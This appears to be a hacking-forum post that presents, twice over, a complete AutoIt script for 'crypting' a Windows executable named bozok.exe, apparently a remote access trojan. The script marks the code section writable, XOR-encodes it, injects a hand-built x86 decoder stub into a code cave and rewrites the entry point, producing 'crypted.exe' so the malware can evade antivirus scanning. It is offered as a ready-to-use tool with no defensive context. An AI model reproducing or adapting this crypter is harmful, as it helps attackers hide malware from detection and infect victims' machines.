dEEpEst
☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
- Joined
- Mar 29, 2018
- Messages
- 13,862
- Solutions
- 4
- Reputation
- 32
- Reaction score
- 45,552
- Points
- 1,813
- Credits
- 55,350
7 Years of Service
56%
Credits :¿¿¿
[LENGUAJE=autoit] #include
; ##################################################################################################
; #### 1. Open a PE file in binary modus
; ##################################################################################################
$sFile1 = "bozok.exe"
$hFileOpen1 = FileOpen ($sFile1,16)
$sBin = FileRead ($hFileOpen1)
If @error = True Then
beep()
MsgBox(0,"Error","File not found in script directory")
FileClose ($hFileOpen1)
Exit
EndIf
FileClose ($hFileOpen1)
ConsoleWrite(" + Read file done" & @CRLF)
;MsgBox(0,"Hex View:",$sBin)
; ##################################################################################################
; #### 2a. Get Autoit string pointer position of code section
; ##################################################################################################
$sCODE = "434F4445" ; "CODE"
$pStartPosition = 1
$pStringPointer_1 = StringInStr($sBin, $sCODE, 1, 1, $pStartPosition )
If $pStringPointer_1 = 0 Then
beep()
MsgBox(0,"Error", "File does not contain a named CODE section, try ""text" )
Exit
Else
ConsoleWrite(" + Found Autoit string poiter of ""CODE"" in FileHeader " &@CRLF)
EndIf
;MsgBox(0,"Autoit String Pointer:",$pStringPointer_1)
; ##################################################################################################
; #### 2b. Get values of FileHeader with string pointer position & addition
; ##################################################################################################
; PE Format:
;
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$szNamefield = 16 ; 8 bytes
$pVirtualSize = $pStringPointer_1 + $szNamefield
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
_VirtualSize()
Func _VirtualSize()
$aVZ = StringRegExp($sBin,"(..)(..)(..)(..)", 2, $pVirtualSize)
If IsArray($aVZ) = True Then
;_ArrayDisplay($aVZ)
Global $sVZ_1 = $aVZ[2] & $aVZ[1] ; reverse litle Indian
Global $sVZ_2 = $aVZ[4] & $aVZ[3]
Global $hVirtualSize = "0x" & $sVZ_2 & $sVZ_1
EndIf
EndFunc
ConsoleWrite(" + VirtualSize = " & $hVirtualSize & @CRLF)
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$szVirtualSize = 8 ; 4 bytes or double word
$pVirtualOffset = $pVirtualSize + $szVirtualSize
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$aVO = StringRegExp($sBin, "(..)(..)(..)(..)", 2, $pVirtualOffset)
If IsArray($aVO) = True Then
;_ArrayDisplay($aVO)
$sVO_1 = $aVO[2] & $aVO[1]
$sVO_2 = $aVO[4] & $aVO[3]
$hVirtualOffset = "0x" & $sVO_2 & $sVO_1
ConsoleWrite(" + VirtualOffset = " & $hVirtualOffset & @CRLF)
EndIf
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$szVirtualOffset = 8
$pRawSize = $pVirtualOffset + $szVirtualOffset
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$aRS = StringRegExp($sBin, "(..)(..)(..)(..)", 2, $pRawSize)
If IsArray($aRS) = True Then
;_ArrayDisplay($aRS)
$sRS_1 = $aRS[2] & $aRS[1]
$sRS_2 = $aRS[4] & $aRS[3]
$hRawSize = "0x" & $sRS_2 & $sRS_1
ConsoleWrite(" + RawSize = " & $hRawSize & @CRLF)
EndIf
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$szRawSize = 8
$pRawOffset = $pRawSize + $szRawSize
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$aRO = StringRegExp($sBin, "(..)(..)(..)(..)", 2, $pRawOffset)
If IsArray($aRO) = True Then
;_ArrayDisplay($aRO)
$sRO_1 = $aRO[2] & $aRO[1]
$sRO_2 = $aRO[4] & $aRO[3]
$hRawOffset = $sRO_2 & $sRO_1
ConsoleWrite(" + RawOffset = 0x" & $hRawOffset & @CRLF)
EndIf
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$szRawOffset = 8
$12ByteFreeSpace = 24
$pCharacteristics = $pRawOffset + $szRawOffset + $12ByteFreeSpace
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$aChar = StringRegExp($sBin, "(..)(..)(..)(..)", 2, $pCharacteristics)
If IsArray($aChar) = True Then
$sChar_1 = $aChar[2] & $aChar[1]
$sChar_2 = $aChar[4] & $aChar[3]
$Characteristics = "0x" & $sChar_2 & $sChar_1
ConsoleWrite(" + Read Characteristics = " & $Characteristics & @CRLF)
If $aChar[4] "E0" Then ; makes code section writeable
$sReplace = $aChar[1] & $aChar[2] & $aChar[3] & "E0"
;MsgBox(0,"test", $sReplace)
$sNewBin = StringReplace ( $sBin, $aChar[0],$sReplace, 1 )
$sBin = $sNewBin
;$aView = StringRegExp($sNewBin , "(..)(..)(..)(..)", 1, $pCharacteristics)
;_ArrayDisplay($aView)
ConsoleWrite("+ Set writeable flag in code section done." & @CRLF)
EndIf
EndIf
; ##################################################################################################
; #### 3. Convert the found hex values from FileHeader to Autoit String Pointer
; ##################################################################################################
; + Get $pStartOfSection
; hex2dec
$dRawOffset = dec($hRawOffset)
$pFix = $dRawOffset * 2
$pStartOfSection = $pFix + 3
;MsgBox(0,"$pStartOfSection", $pStartOfSection)
;$aView = StringRegExp($sBin, "(........)", 1, $pStartOfSection) ; 8 signs = 4 bytes
;_ArrayDisplay($aView)
; ==================================================================================================
; + Get $pEndOfSection
$dRawSize = dec($sRS_1)
$dRawOffset = dec($sRO_1)
$pFix = ($dRawSize*2) + ($dRawOffset*2)
$pEndOfSection = $pFix + 3
;MsgBox(0,"EndOfsection",$pEndOfSection )
;$View2 = StringRegExp($sBin, "(....)", 1, $pEndOfSection - 2) ; without -2 = next section start
;_ArrayDisplay($View2)
; ==================================================================================================
; + Get $pEndOfCode for XOR encode
$dVirtualSize = dec($sVZ_1)
$pFix2 = ($dVirtualSize*2) + ($dRawOffset*2)
$pEndOfCode = $pFix2 + 3
;MsgBox(0,"pEndOfCode",$pEndOfCode )
;$View3 = StringRegExp($sBin, "(....)", 1, $pEndOfCode - 2) ; without -2 = next section start
;_ArrayDisplay($View3)
; ##################################################################################################
; #### 4. XOR encoding
; ##################################################################################################
MsgBox(0,"XOR encoding","Start")
$xCounter = $pStartOfSection
$hKey = 0xde
$hKeyb = "DE"
; XOR code section
Do
_XOR($xCounter,$hKey)
$xCounter = $xCounter + 2
Until $xCounter = $pEndOfCode
MsgBox(0,"XOR encoding ","End")
ConsoleWrite("+ XOR encoding complete" & @CRLF)
; ##################################################################################################
; #### 5a. Get Autoit string pointer position of "PE" for Entrypoint and Imagebase
; ##################################################################################################
$sPE = "5045" ; "PE"
$pStartPosition = 1
$pStringPointer_2 = StringInStr($sBin, $sPE, 1, 1, $pStartPosition )
;MsgBox(0,"PE pointer",$pStringPointer_2 )
; ##################################################################################################
; #### 5b. Get Entrypoint and Imagebase values for the shellcode
; ##################################################################################################
$pEntryPoint = $pStringPointer_2 + 80
_Entrypoint()
Func _Entrypoint()
$aEP = StringRegExp($sBin,"(..)(..)(..)(..)", 2, $pEntryPoint)
;_ArrayDisplay($aEP)
If IsArray($aEP) = True Then
$sEP_1 = $aEP[2] & $aEP[1]
$sEP_2 = $aEP[4] & $aEP[3]
Global $hEntryPoint = "0x" & $sEP_2 & $sEP_1
;MsgBox(0,"EntryPoint",$hEntryPoint)
EndIf
EndFunc
$pImageBase = $pEntryPoint + 24
$aIB = StringRegExp($sBin,"(..)(..)(..)(..)", 2, $pImageBase)
;_ArrayDisplay($aIB)
If IsArray($aIB) = True Then
$sIB_1 = $aIB[2] & $aIB[1]
$sIB_2 = $aIB[4] & $aIB[3]
$hImageBase = "0x" & $sIB_2 & $sIB_1
;MsgBox(0,"ImageBase",$hImageBase)
EndIf
; + Convert Autoit pEndOfCode to hexadecimal
$dVirtualOffset = dec($sVO_1)
$dRawOffset = dec($sRO_1)
$dEndOfCode = ($pEndOfCode - 3) / 2
$dEndOfCode = $dEndOfCode + $dVirtualOffset - $dRawOffset
$hEndOfCode = _Dec2Hex($dEndOfCode)
;MsgBox(0,"EndOfCode Pointer",$hEndOfCode & " hex or " & $dEndOfCode & " dez")
; and split it for XOR shellcode
$EOC1 = StringRight ($hEndOfCode, 2)
$EOC2 = StringMid ($hEndOfCode, 1, 2)
;MsgBox(0, "", $EOC1 & " & " & $EOC2 )
; ##################################################################################################
; #### 5c. Create assembler shellcode with the needed values from Fileheader
; ##################################################################################################
; ASM codes
;
; B8 00104000 MOV EAX,00401000 ; Move start address to EAX
; 8030 DE XOR BYTE PTR DS:[EAX],0DE ; XOR one byte
; 40 INC EAX ; Increase Eax +1
; 3D A8644000 CMP EAX,004064A8 ; Compare start address (EAX) with end of address
; 72 F5 JB SHORT 004064AD ; If EAX != end address, jump back to xor (loop)
; EB CE JMP SHORT ModuleEntryPoint ; If EAX = end address,jump to original entrypoint
$cMOV_EAX_Start = "B8" & $aVO[1] & $aVO[2] & $aIB[3] & $aIB[4]
$cXOR_Key = "8030" & $hKeyb
$cINC_EAX = "40"
$cCMP_EAX_End = "3D" & $EOC1 & $EOC2 & $aIB[3] & $aIB[4]
$cJB = "72F5"
$cJMP = "EBCE"
$sASM_XORdecode = $cMOV_EAX_Start & $cXOR_Key & $cINC_EAX & $cCMP_EAX_End & $cJB & $cJMP
ConsoleWrite("+ Created shellcode = " & $sASM_XORdecode & @CRLF)
; ##################################################################################################
; #### 5d. Write shellcode into codevave
; ##################################################################################################
$sBin = StringReplace($sBin, $pEndOfCode, $sASM_XORdecode)
; ##################################################################################################
; #### 6. Fix new entrypoint and VirtualSize in FileHeader
; ##################################################################################################
; Fix Entrypoint
$iNewEntrypoint = $EOC1 & $EOC2
$sBin = StringReplace($sBin,$pEntryPoint,$iNewEntrypoint,1)
_Entrypoint() ; read again
ConsoleWrite("+ Set new Entrypoint in fileheader to " & $hEntryPoint &@CRLF)
; Shellcode size
$StringLen = StringLen($sASM_XORdecode)
$bLen = $StringLen / 2 ; get byte size
; VirtualSize
$hVirtualSize = $sVZ_2 & $sVZ_1
$dVirtualSize = dec($hVirtualSize)
$dNewVirtualSize = $dVirtualSize + $bLen
$hNewVirtualSize = Hex(int($dNewVirtualSize),4)
; split
$hNVZ1 = StringRight ($hNewVirtualSize, 2)
$hNVZ2 = StringMid ($hNewVirtualSize, 1, 2)
$sIndiVirtualSize = $hNVZ1 & $hNVZ2
;MsgBox(0,"LitleIndian VirtualSize", $sIndiVirtualSize )
$sNewBin = StringReplace ( $sBin, $pVirtualSize ,$sIndiVirtualSize , 1 )
$sBin = $sNewBin
_VirtualSize()
ConsoleWrite("+ Set new VirtualSize in fileheader to " & $hVirtualSize & @CRLF )
; ##################################################################################################
; #### 7. Write new file on HDD
; ##################################################################################################
$sNewName = @ScriptDir & "\crypted.exe"
$hFile2 = FileOpen($sNewName ,2)
If @error = True Then MsgBox(0,"Error","FileOpen") EndIf
FileWrite($hFile2, binary($sBin))
If @error = True Then MsgBox(0,"Error","FileWrite") EndIf
FileClose($hFile2)
If @error = True Then MsgBox(0,"Error","FileClose") EndIf
MsgBox(0,"File", "done!")
; FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
; **************************************************************************************************
#region
; FUNCS
Func _ZeroCheck($i)
$i = $i - 2
Local $aPointer = StringRegExp($sBin, "(..)", 1, $i )
If IsArray($aPointer) = True Then
If $aPointer[0] = "00" Then
return 1
Else
return 0
EndIf
EndIf
EndFunc
Func _XOR($i,$hKey)
Local $aPointer = StringRegExp($sBin, "(..)", 1, $i )
If IsArray($aPointer) = True Then
$bHex = "0x" & $aPointer[0]
$dRet = BitXOR($bHex, $hKey)
$hRet = Hex(int($dRet),2)
$sBin = StringReplace ($sBin, $i,$hRet, -1 )
EndIf
EndFunc
; convert to hex
Func _Dec2Hex($iDezPosi)
local $iHex_Posi = Hex(int($iDezPosi),4 ) ; 4 = size
$Ret = $iHex_Posi
return $Ret
EndFunc
#endregion
; FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
; **************************************************************************************************
[/LENGUAJE]
[LENGUAJE=autoit] #include
; ##################################################################################################
; #### 1. Open a PE file in binary modus
; ##################################################################################################
$sFile1 = "bozok.exe"
$hFileOpen1 = FileOpen ($sFile1,16)
$sBin = FileRead ($hFileOpen1)
If @error = True Then
beep()
MsgBox(0,"Error","File not found in script directory")
FileClose ($hFileOpen1)
Exit
EndIf
FileClose ($hFileOpen1)
ConsoleWrite(" + Read file done" & @CRLF)
;MsgBox(0,"Hex View:",$sBin)
; ##################################################################################################
; #### 2a. Get Autoit string pointer position of code section
; ##################################################################################################
$sCODE = "434F4445" ; "CODE"
$pStartPosition = 1
$pStringPointer_1 = StringInStr($sBin, $sCODE, 1, 1, $pStartPosition )
If $pStringPointer_1 = 0 Then
beep()
MsgBox(0,"Error", "File does not contain a named CODE section, try ""text" )
Exit
Else
ConsoleWrite(" + Found Autoit string poiter of ""CODE"" in FileHeader " &@CRLF)
EndIf
;MsgBox(0,"Autoit String Pointer:",$pStringPointer_1)
; ##################################################################################################
; #### 2b. Get values of FileHeader with string pointer position & addition
; ##################################################################################################
; PE Format:
;
This link is hidden for visitors. Please Log in or register now.
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$szNamefield = 16 ; 8 bytes
$pVirtualSize = $pStringPointer_1 + $szNamefield
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
_VirtualSize()
Func _VirtualSize()
$aVZ = StringRegExp($sBin,"(..)(..)(..)(..)", 2, $pVirtualSize)
If IsArray($aVZ) = True Then
;_ArrayDisplay($aVZ)
Global $sVZ_1 = $aVZ[2] & $aVZ[1] ; reverse litle Indian
Global $sVZ_2 = $aVZ[4] & $aVZ[3]
Global $hVirtualSize = "0x" & $sVZ_2 & $sVZ_1
EndIf
EndFunc
ConsoleWrite(" + VirtualSize = " & $hVirtualSize & @CRLF)
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$szVirtualSize = 8 ; 4 bytes or double word
$pVirtualOffset = $pVirtualSize + $szVirtualSize
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$aVO = StringRegExp($sBin, "(..)(..)(..)(..)", 2, $pVirtualOffset)
If IsArray($aVO) = True Then
;_ArrayDisplay($aVO)
$sVO_1 = $aVO[2] & $aVO[1]
$sVO_2 = $aVO[4] & $aVO[3]
$hVirtualOffset = "0x" & $sVO_2 & $sVO_1
ConsoleWrite(" + VirtualOffset = " & $hVirtualOffset & @CRLF)
EndIf
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$szVirtualOffset = 8
$pRawSize = $pVirtualOffset + $szVirtualOffset
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$aRS = StringRegExp($sBin, "(..)(..)(..)(..)", 2, $pRawSize)
If IsArray($aRS) = True Then
;_ArrayDisplay($aRS)
$sRS_1 = $aRS[2] & $aRS[1]
$sRS_2 = $aRS[4] & $aRS[3]
$hRawSize = "0x" & $sRS_2 & $sRS_1
ConsoleWrite(" + RawSize = " & $hRawSize & @CRLF)
EndIf
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$szRawSize = 8
$pRawOffset = $pRawSize + $szRawSize
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$aRO = StringRegExp($sBin, "(..)(..)(..)(..)", 2, $pRawOffset)
If IsArray($aRO) = True Then
;_ArrayDisplay($aRO)
$sRO_1 = $aRO[2] & $aRO[1]
$sRO_2 = $aRO[4] & $aRO[3]
$hRawOffset = $sRO_2 & $sRO_1
ConsoleWrite(" + RawOffset = 0x" & $hRawOffset & @CRLF)
EndIf
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$szRawOffset = 8
$12ByteFreeSpace = 24
$pCharacteristics = $pRawOffset + $szRawOffset + $12ByteFreeSpace
; ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
$aChar = StringRegExp($sBin, "(..)(..)(..)(..)", 2, $pCharacteristics)
If IsArray($aChar) = True Then
$sChar_1 = $aChar[2] & $aChar[1]
$sChar_2 = $aChar[4] & $aChar[3]
$Characteristics = "0x" & $sChar_2 & $sChar_1
ConsoleWrite(" + Read Characteristics = " & $Characteristics & @CRLF)
If $aChar[4] "E0" Then ; makes code section writeable
$sReplace = $aChar[1] & $aChar[2] & $aChar[3] & "E0"
;MsgBox(0,"test", $sReplace)
$sNewBin = StringReplace ( $sBin, $aChar[0],$sReplace, 1 )
$sBin = $sNewBin
;$aView = StringRegExp($sNewBin , "(..)(..)(..)(..)", 1, $pCharacteristics)
;_ArrayDisplay($aView)
ConsoleWrite("+ Set writeable flag in code section done." & @CRLF)
EndIf
EndIf
; ##################################################################################################
; #### 3. Convert the found hex values from FileHeader to Autoit String Pointer
; ##################################################################################################
; + Get $pStartOfSection
; hex2dec
$dRawOffset = dec($hRawOffset)
$pFix = $dRawOffset * 2
$pStartOfSection = $pFix + 3
;MsgBox(0,"$pStartOfSection", $pStartOfSection)
;$aView = StringRegExp($sBin, "(........)", 1, $pStartOfSection) ; 8 signs = 4 bytes
;_ArrayDisplay($aView)
; ==================================================================================================
; + Get $pEndOfSection
$dRawSize = dec($sRS_1)
$dRawOffset = dec($sRO_1)
$pFix = ($dRawSize*2) + ($dRawOffset*2)
$pEndOfSection = $pFix + 3
;MsgBox(0,"EndOfsection",$pEndOfSection )
;$View2 = StringRegExp($sBin, "(....)", 1, $pEndOfSection - 2) ; without -2 = next section start
;_ArrayDisplay($View2)
; ==================================================================================================
; + Get $pEndOfCode for XOR encode
$dVirtualSize = dec($sVZ_1)
$pFix2 = ($dVirtualSize*2) + ($dRawOffset*2)
$pEndOfCode = $pFix2 + 3
;MsgBox(0,"pEndOfCode",$pEndOfCode )
;$View3 = StringRegExp($sBin, "(....)", 1, $pEndOfCode - 2) ; without -2 = next section start
;_ArrayDisplay($View3)
; ##################################################################################################
; #### 4. XOR encoding
; ##################################################################################################
MsgBox(0,"XOR encoding","Start")
$xCounter = $pStartOfSection
$hKey = 0xde
$hKeyb = "DE"
; XOR code section
Do
_XOR($xCounter,$hKey)
$xCounter = $xCounter + 2
Until $xCounter = $pEndOfCode
MsgBox(0,"XOR encoding ","End")
ConsoleWrite("+ XOR encoding complete" & @CRLF)
; ##################################################################################################
; #### 5a. Get Autoit string pointer position of "PE" for Entrypoint and Imagebase
; ##################################################################################################
$sPE = "5045" ; "PE"
$pStartPosition = 1
$pStringPointer_2 = StringInStr($sBin, $sPE, 1, 1, $pStartPosition )
;MsgBox(0,"PE pointer",$pStringPointer_2 )
; ##################################################################################################
; #### 5b. Get Entrypoint and Imagebase values for the shellcode
; ##################################################################################################
$pEntryPoint = $pStringPointer_2 + 80
_Entrypoint()
Func _Entrypoint()
$aEP = StringRegExp($sBin,"(..)(..)(..)(..)", 2, $pEntryPoint)
;_ArrayDisplay($aEP)
If IsArray($aEP) = True Then
$sEP_1 = $aEP[2] & $aEP[1]
$sEP_2 = $aEP[4] & $aEP[3]
Global $hEntryPoint = "0x" & $sEP_2 & $sEP_1
;MsgBox(0,"EntryPoint",$hEntryPoint)
EndIf
EndFunc
$pImageBase = $pEntryPoint + 24
$aIB = StringRegExp($sBin,"(..)(..)(..)(..)", 2, $pImageBase)
;_ArrayDisplay($aIB)
If IsArray($aIB) = True Then
$sIB_1 = $aIB[2] & $aIB[1]
$sIB_2 = $aIB[4] & $aIB[3]
$hImageBase = "0x" & $sIB_2 & $sIB_1
;MsgBox(0,"ImageBase",$hImageBase)
EndIf
; + Convert Autoit pEndOfCode to hexadecimal
$dVirtualOffset = dec($sVO_1)
$dRawOffset = dec($sRO_1)
$dEndOfCode = ($pEndOfCode - 3) / 2
$dEndOfCode = $dEndOfCode + $dVirtualOffset - $dRawOffset
$hEndOfCode = _Dec2Hex($dEndOfCode)
;MsgBox(0,"EndOfCode Pointer",$hEndOfCode & " hex or " & $dEndOfCode & " dez")
; and split it for XOR shellcode
$EOC1 = StringRight ($hEndOfCode, 2)
$EOC2 = StringMid ($hEndOfCode, 1, 2)
;MsgBox(0, "", $EOC1 & " & " & $EOC2 )
; ##################################################################################################
; #### 5c. Create assembler shellcode with the needed values from Fileheader
; ##################################################################################################
; ASM codes
;
This link is hidden for visitors. Please Log in or register now.
; B8 00104000 MOV EAX,00401000 ; Move start address to EAX
; 8030 DE XOR BYTE PTR DS:[EAX],0DE ; XOR one byte
; 40 INC EAX ; Increase Eax +1
; 3D A8644000 CMP EAX,004064A8 ; Compare start address (EAX) with end of address
; 72 F5 JB SHORT 004064AD ; If EAX != end address, jump back to xor (loop)
; EB CE JMP SHORT ModuleEntryPoint ; If EAX = end address,jump to original entrypoint
$cMOV_EAX_Start = "B8" & $aVO[1] & $aVO[2] & $aIB[3] & $aIB[4]
$cXOR_Key = "8030" & $hKeyb
$cINC_EAX = "40"
$cCMP_EAX_End = "3D" & $EOC1 & $EOC2 & $aIB[3] & $aIB[4]
$cJB = "72F5"
$cJMP = "EBCE"
$sASM_XORdecode = $cMOV_EAX_Start & $cXOR_Key & $cINC_EAX & $cCMP_EAX_End & $cJB & $cJMP
ConsoleWrite("+ Created shellcode = " & $sASM_XORdecode & @CRLF)
; ##################################################################################################
; #### 5d. Write shellcode into codevave
; ##################################################################################################
$sBin = StringReplace($sBin, $pEndOfCode, $sASM_XORdecode)
; ##################################################################################################
; #### 6. Fix new entrypoint and VirtualSize in FileHeader
; ##################################################################################################
; Fix Entrypoint
$iNewEntrypoint = $EOC1 & $EOC2
$sBin = StringReplace($sBin,$pEntryPoint,$iNewEntrypoint,1)
_Entrypoint() ; read again
ConsoleWrite("+ Set new Entrypoint in fileheader to " & $hEntryPoint &@CRLF)
; Shellcode size
$StringLen = StringLen($sASM_XORdecode)
$bLen = $StringLen / 2 ; get byte size
; VirtualSize
$hVirtualSize = $sVZ_2 & $sVZ_1
$dVirtualSize = dec($hVirtualSize)
$dNewVirtualSize = $dVirtualSize + $bLen
$hNewVirtualSize = Hex(int($dNewVirtualSize),4)
; split
$hNVZ1 = StringRight ($hNewVirtualSize, 2)
$hNVZ2 = StringMid ($hNewVirtualSize, 1, 2)
$sIndiVirtualSize = $hNVZ1 & $hNVZ2
;MsgBox(0,"LitleIndian VirtualSize", $sIndiVirtualSize )
$sNewBin = StringReplace ( $sBin, $pVirtualSize ,$sIndiVirtualSize , 1 )
$sBin = $sNewBin
_VirtualSize()
ConsoleWrite("+ Set new VirtualSize in fileheader to " & $hVirtualSize & @CRLF )
; ##################################################################################################
; #### 7. Write new file on HDD
; ##################################################################################################
$sNewName = @ScriptDir & "\crypted.exe"
$hFile2 = FileOpen($sNewName ,2)
If @error = True Then MsgBox(0,"Error","FileOpen") EndIf
FileWrite($hFile2, binary($sBin))
If @error = True Then MsgBox(0,"Error","FileWrite") EndIf
FileClose($hFile2)
If @error = True Then MsgBox(0,"Error","FileClose") EndIf
MsgBox(0,"File", "done!")
; FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
; **************************************************************************************************
#region
; FUNCS
Func _ZeroCheck($i)
$i = $i - 2
Local $aPointer = StringRegExp($sBin, "(..)", 1, $i )
If IsArray($aPointer) = True Then
If $aPointer[0] = "00" Then
return 1
Else
return 0
EndIf
EndIf
EndFunc
Func _XOR($i,$hKey)
Local $aPointer = StringRegExp($sBin, "(..)", 1, $i )
If IsArray($aPointer) = True Then
$bHex = "0x" & $aPointer[0]
$dRet = BitXOR($bHex, $hKey)
$hRet = Hex(int($dRet),2)
$sBin = StringReplace ($sBin, $i,$hRet, -1 )
EndIf
EndFunc
; convert to hex
Func _Dec2Hex($iDezPosi)
local $iHex_Posi = Hex(int($iDezPosi),4 ) ; 4 = size
$Ret = $iHex_Posi
return $Ret
EndFunc
#endregion
; FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
; **************************************************************************************************
[/LENGUAJE]